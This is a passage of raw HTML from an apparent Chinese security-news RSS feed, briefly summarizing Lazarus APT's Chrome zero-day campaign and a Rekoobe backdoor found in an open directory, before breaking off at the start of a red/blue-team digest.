		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">Lazarus APT 利用其标志性恶意软件 Manuscrypt 进行攻击，其中包含了对 Google Chrome 的零日漏洞利用，攻击者通过一个模仿 DeFi NFT 游戏的网站诱骗用户点击，从而完全控制受害者的电脑。</span>
		</p>
	</blockquote><section style="color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);margin-top: 20px;margin-bottom: 10px;border-width: initial;border-style: none;border-color: initial;overflow: hidden;">
	<section style="display: flex;flex-wrap: nowrap;overflow-x: scroll;">
	
	<img class="rich_pages wxw-img" data-ratio="0.08018154311649017" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" data-w="661" src="https://wechat2rss.xlab.app/img-proxy/?k=b92a98cc&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmJNnhzN4MHpcYicDvJ184EAdGg4ZKicpGtMArE4JsibGBFVMvMcIwjkjaRzRYsctibYsROxrVArHFVLg%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.5625" data-w="1024" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=aafb876e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmJNnhzN4MHpcYicDvJ184EA9t9uAGEx6l1qQLA8lAIRX6L8c9fwgcttCce0ibiaDmiaFKKXIndKEQFEg%2F640%3Ffrom%3Dappmsg"/>
	
	<img class="rich_pages wxw-img" data-ratio="0.5625" data-w="1024" style="vertical-align: middle;border-style: none;margin-right: auto;margin-left: auto;display: inline-block;" src="https://wechat2rss.xlab.app/img-proxy/?k=321ca58e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2Ficqm3vRUymZmJNnhzN4MHpcYicDvJ184EALuUeCE3JLcUT45kCXvR57DnWdFBg4ibVN0PHHPvL8Tx2BDpUU8npGvg%2F640%3Ffrom%3Dappmsg"/>
	</section></section><p style="margin-bottom: 0px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: 0em;text-indent: 0em;text-wrap: wrap;background-color: rgb(255, 255, 255);color: rgb(89, 89, 89);font-size: 16px;line-height: 1.8em;text-align: center;"><span style="display: block;color: rgb(136, 136, 136);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;">&lt;&lt;&lt;左右滑动见更多 &gt;&gt;&gt;</span></p>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">朝鲜黑客利用零日漏洞攻击视频游戏行业，盗取加密货币</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Chrome 远程代码执行漏洞 CVE-2024-4947 分析</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmJNnhzN4MHpcYicDvJ184EAibcjToXoic7HwHfTylWODEibTWL6eBQF8Qy7SMas0O1HxwD97tjDPicYHw/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmJNnhzN4MHpcYicDvJ184EAibcjToXoic7HwHfTylWODEibTWL6eBQF8Qy7SMas0O1HxwD97tjDPicYHw/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=5121542884282244"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Lazarus APT 利用了高度复杂的社交工程和零日漏洞来进行攻击，这表明他们在金融获利方面的动机和技术能力的持续发展。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">攻击者通过模拟真实 DeFi NFT 游戏的网站，诱骗用户下载恶意软件，展示了他们在社交工程方面的专业技能。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Lazarus 利用了 V8 引擎的漏洞，特别是新引入的 Maglev 编译器的漏洞，以及 Irregexp VM 的漏洞来绕过 V8 沙箱，这表明他们对浏览器内部工作机制有深入的了解。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Kaspersky 在发现这些漏洞后，采取了负责任的披露政策，帮助了 Google 修复漏洞，并通过开发自己的游戏服务器来研究攻击者的手段，展示了他们在应对高级威胁行为者方面的专业能力。</section></li></ul>
	<br/>
	<p>🏷️: Lazarus APT, 加密货币, 零日漏洞, 网络安全, 威胁行为者</p><h3 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 18px;color: rgb(34, 34, 34);line-height: 1.8em;letter-spacing: 0em;padding-left: 10px;border-style: none none none solid;border-width: 1px 1px 1px 2px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);border-radius: 0px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">0x15
			 开放目录中发现Rekoobe后门，或针对TradingView用户</span></h3>
	<blockquote style="-webkit-text-stroke-width:0px;background-color:rgb(251, 249, 253);border-bottom-color:rgba(0, 0, 0, 0.4);border-bottom-style:none;border-left-color:rgb(53, 179, 120);border-left-style:solid;border-radius:0px;border-right-color:rgba(0, 0, 0, 0.4);border-right-style:none;border-top-color:rgba(0, 0, 0, 0.4);border-top-style:none;border-width:3px;box-shadow:rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing:border-box;color:rgba(0, 0, 0, 0.85);display:block;font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:normal;margin:20px 0px;orphans:2;overflow:auto;padding:10px 10px 10px 20px;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-spacing:0px;">
		<p><span style="background-color:rgb(251,249,253);color:rgb(63,63,63);font-family:Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size:16px;"></span><span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:0.32px;orphans:2;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;widows:2;word-spacing:0px;">研究人员在开放目录中发现了Rekoobe后门，该后门可能针对TradingView用户，并且与APT31等攻击者的网络攻击活动有关。</span>
		</p>
	</blockquote>


	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">热评</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Rekoobe 恶意软件样本公开目录揭示交易平台风险</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">交易平台后门“Rekoobe”被发现，可能针对TradingView用户</section></li></ul>
	<section>
		<mp-common-miniprogram class="js_uneditable custom_select_card mp_miniprogram_iframe" data-miniprogram-nickname="知识星球" data-miniprogram-avatar="http://mmbiz.qpic.cn/mmbiz_png/kialtkOXGKS4dUh8fgYibf2xQHEgUH6RvJGicQ90YpZY3nVxKuuuc19CqV5HIn0nTreQFKSR0mVTNHvRNzD5TQItw/640?wx_fmt=png&amp;wxfrom=200" data-miniprogram-title="参与更多讨论" data-miniprogram-imageurl="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmJNnhzN4MHpcYicDvJ184EAmey5gibjIicX0FQNwBjXnuaWIztEicggoZClL4cwr715ExkFEUvGnTj0w/0?from=appmsg" data-miniprogram-type="card" data-miniprogram-servicetype="0" data-pluginname="insertminiprogram" data-miniprogram-appid="wx4f706964b979122a" data-miniprogram-applink="#小程序://知识星球/" data-miniprogram-imageurlback="http://mmbiz.qpic.cn/sz_mmbiz_jpg/icqm3vRUymZmJNnhzN4MHpcYicDvJ184EAmey5gibjIicX0FQNwBjXnuaWIztEicggoZClL4cwr715ExkFEUvGnTj0w/0?from=appmsg" data-miniprogram-cropperinfo="%7B%22c%22%3A%7B%22x%22%3A0%2C%22y%22%3A0%2C%22x2%22%3A180%2C%22y2%22%3A144%2C%22w%22%3A180%2C%22h%22%3A144%7D%7D" data-miniprogram-path="pages/topicdetail/topicdetail?topic_id=4848524112411188"></mp-common-miniprogram>
	</section>
	<h3 style="margin-top: 30px;margin-bottom: 15px;color: rgba(0, 0, 0, 0.85);font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;letter-spacing: normal;text-wrap: wrap;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;flex-direction: unset;float: unset;height: auto;justify-content: unset;line-height: 1.5em;overflow: unset;text-align: left;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">
		<span style="background-image: url(&#34;https://mmbiz.qpic.cn/sz_mmbiz_png/icqm3vRUymZmf8HKsAOjMBqkaZeYOnBbglyuOPwiazwvzZFAUbS3iak6Mabse8Es5JCN0YTDm44A4WHMre5cJNorg/640?wx_fmt=png&amp;from=appmsg&#34;);background-position: 0% 0%;background-size: 15px 15px;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;width: 15px;height: 15px;align-items: unset;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;color: rgb(0, 0, 0);display: inline-block;font-size: 22px;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;letter-spacing: 0px;line-height: 1.5em;margin-bottom: -2px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;"></span><span style="color: rgb(72, 179, 120);line-height: 1.5em;letter-spacing: 0em;align-items: unset;background-image: none;background-position: 0% 0%;background-size: auto;background-repeat: no-repeat;background-attachment: scroll;background-origin: padding-box;background-clip: border-box;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: inline-block;font-weight: bold;flex-direction: unset;float: unset;height: auto;justify-content: unset;margin-left: 8px;overflow: unset;text-indent: 0em;text-shadow: none;transform: none;width: auto;-webkit-box-reflect: unset;">关键信息点</span>
	</h3><ul style="margin-top: 8px;margin-bottom: 8px;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;letter-spacing: normal;text-align: start;text-wrap: wrap;background-color: rgb(255, 255, 255);padding-left: 25px;color: rgb(0, 0, 0);" class="list-paddingleft-1"><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">Rekoobe后门的发现揭示了针对特定金融平台用户的可能威胁，特别是TradingView用户。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">开放目录中的恶意软件样本和模仿性域名的存在暗示了攻击者试图通过网络间谍和数据窃取来实现其目标。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">通过共享SSH密钥的方式，研究人员能够揭示更广泛的攻击者基础设施网络，这表明了进一步的安全威胁。</section></li><li><section style="margin-top: 5px;margin-bottom: 5px;color: rgb(63, 63, 63);font-size: 16px;line-height: 1.8em;letter-spacing: 0.02em;">合法安全工具（如Yakit）的恶意使用提醒了安全社区需要对这类工具的使用保持警惕，以防其被用于不良目的。</section></li></ul>
	<br/>
	<p>🏷️: Rekoobe, 后门, TradingView, APT31, 网络攻击</p></section><p><br/></p><figure style="-webkit-text-stroke-width: 0px;align-items: center;background-color: rgb(255, 255, 255);box-sizing: border-box;color: rgba(0, 0, 0, 0.85);display: flex;flex-direction: column;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 14px;font-style: normal;font-variant-caps: normal;font-variant-ligatures: normal;font-weight: 400;justify-content: center;letter-spacing: normal;margin: 10px 0px;orphans: 2;padding: 0px;text-align: start;text-decoration-color: initial;text-decoration-style: initial;text-decoration-thickness: initial;text-indent: 0px;text-transform: none;white-space: normal;widows: 2;word-spacing: 0px;">
	<figure><img class="rich_pages wxw-img" data-ratio="1.5548387096774194" width="300" data-w="930" height="420" style="border-radius: 4px;border-width: 3px;border-style: none;border-color: rgba(0, 0, 0, 0.4);box-shadow: rgba(0, 0, 0, 0) 0px 0px 0px 0px;box-sizing: border-box;display: block;margin: 0px;max-width: 100%;object-fit: fill;vertical-align: middle;" src="https://wechat2rss.xlab.app/img-proxy/?k=d2ef266b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2Ficqm3vRUymZmJNnhzN4MHpcYicDvJ184EAsF82SOW8WkBHeJjRBmqRibps2jo1Sgl96oWhW2SBEicxekAaQEnzbblw%2F640%3Fwx_fmt%3Djpeg"/></figure>
	<figcaption style="align-items:center;background-color:rgba(0, 0, 0, 0.7);box-sizing:border-box;color:white;display:flex;font-size:14px;font-weight:normal;justify-content:center;letter-spacing:0em;line-height:35px;margin:-35px 0px 0px;padding:0px;text-align:center;width:304px;z-index:20;">
		快来和老司机们一起学习吧</figcaption></figure><p style="display: none;"><mp-style-type data-value="10000"></mp-style-type></p>



<p><a href="2247487746">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=21ca0a7f&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzU0MDcyMTMxOQ%3D%3D%26mid%3D2247487746%26idx%3D1%26sn%3Db9fb556b77eda920dbd5eca110e709ac%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Fri, 25 Oct 2024 15:42:00 +0800</pubDate>
    </item>
    <item>
      <title>「推安早报」1017 | 域安全、红蓝工具节选</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzU0MDcyMTMxOQ==&amp;mid=2247487735&amp;idx=1&amp;sn=afde6aaf1957c1e157a357d42480bf9e</link>
      <description>红蓝技术节选: 涵盖Kerberoasting缓解、SAML漏洞、活动目录攻击、MikroTik渗透测试、DLL利用、红蓝工具等等</description>
      <content:encoded><![CDATA[<p>
<span>red4blue</span> <span>2024-10-17 17:00</span> <span style="display: inline-block;">北京</span>
</p>

<p>红蓝技术节选: 涵盖Kerberoasting缓解、SAML漏洞、活动目录攻击、MikroTik渗透测试、DLL利用、红蓝工具等等</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=dbed6a69&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2Ficqm3vRUymZmq9olbYbLBTq8AYY0qtCp6A3xACHb6Ot8ccOzofLLbv87Q2F4egDBfOPJZPQmQ0WxEDtqYEsU1icQ%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<section style="margin-bottom: 0px;padding-left: 10px;padding-right: 10px;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;width: auto;font-family: Optima, &#34;Microsoft YaHei&#34;, PingFangSC-regular, serif;font-size: 16px;color: rgb(0, 0, 0);line-height: 1.5em;word-spacing: 0em;letter-spacing: 0em;word-break: break-word;text-align: left;">
	<h1 style="margin-top: 30px;margin-bottom: 15px;align-items: unset;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;border-style: none;border-width: 1px;border-color: rgb(0, 0, 0);border-radius: 0px;box-shadow: none;display: flex;flex-direction: unset;float: unset;height: auto;justify-content: center;line-height: 1.5em;overflow: unset;text-shadow: none;transform: none;width: 100%;-webkit-box-reflect: unset;">
		<span style="display: none;"></span><span style="font-size: 22px;border-color: rgb(0, 0, 0) rgb(0, 0, 0) rgb(0, 150, 136);color: rgb(0, 150, 136);line-height: 1.5em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-image: none;background-origin: padding-box;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;width: 100%;height: auto;align-items: unset;border-style: none none solid;border-width: 1px;border-radius: 0px;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;overflow: unset;padding-bottom: 10px;text-align: center;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;">2024-10-17 「红蓝热点」<span style="color: rgb(0, 150, 136);line-height: 1.5em;letter-spacing: 0em;background-attachment: scroll;background-position: 0% 0%;background-repeat: no-repeat;background-size: auto;width: 100%;height: auto;align-items: unset;box-shadow: none;display: block;font-weight: bold;flex-direction: unset;float: unset;justify-content: unset;overflow: unset;padding-bottom: 10px;text-align: right;text-indent: 0em;text-shadow: none;transform: none;-webkit-box-reflect: unset;font-size: 12px;">每天快人一步</span></span><span style="display: none;"></span></h1>
	<blockquote style="margin-top: 20px;margin-bottom: 20px;padding: 10px 10px 10px 20px;border-top: 3px none rgba(0, 0, 0, 0.4);border-bottom: 3px none rgba(0, 0, 0, 0.4);border-right: 3px solid rgba(0, 150, 136, 0.3);border-left-color: rgb(0, 150, 136);border-radius: 0px;background: none 0% 0% / auto no-repeat scroll padding-box border-box rgba(0, 0, 0, 0.05);width: auto;height: auto;box-shadow: rgba(0, 0, 0, 0) 0px 0px 0px 0px;overflow: auto;"><span style="display: none;color: rgb(0, 0, 0);font-size: 16px;line-height: 1.5em;letter-spacing: 0em;"></span>
		<p style="text-indent: 0em;padding-top: 8px;padding-bottom: 8px;color: rgb(119, 119, 119);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;">
			1. 推送<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">「新、热、赞」</code>，帮部分人<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">阅读提效</code><br/>
			2. 学有<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 0.4);border-radius:4px;border-right:3px none rgba(0, 0, 0, 0.4);border-top:3px none rgb(0, 0, 0);box-sizing:border-box;color:rgb(235, 97, 97);font-family:&#34;Operator Mono&#34;, Consolas, Monaco, Menlo, monospace;font-size:14px;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;height:auto;letter-spacing:0em;line-height:1.8em;margin:0px 2px;orphans:2;overflow-wrap:break-word;padding:2px 4px;text-align:left;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;width:auto;word-break:break-all;word-spacing:0px;">精读浅读深读</code>，艺有<code style="-webkit-text-stroke-width:0px;background-color:rgba(255, 255, 255, 0);border-bottom:1px solid rgba(235, 97, 97, 0.4);border-left:3px none rgba(0, 0, 0, 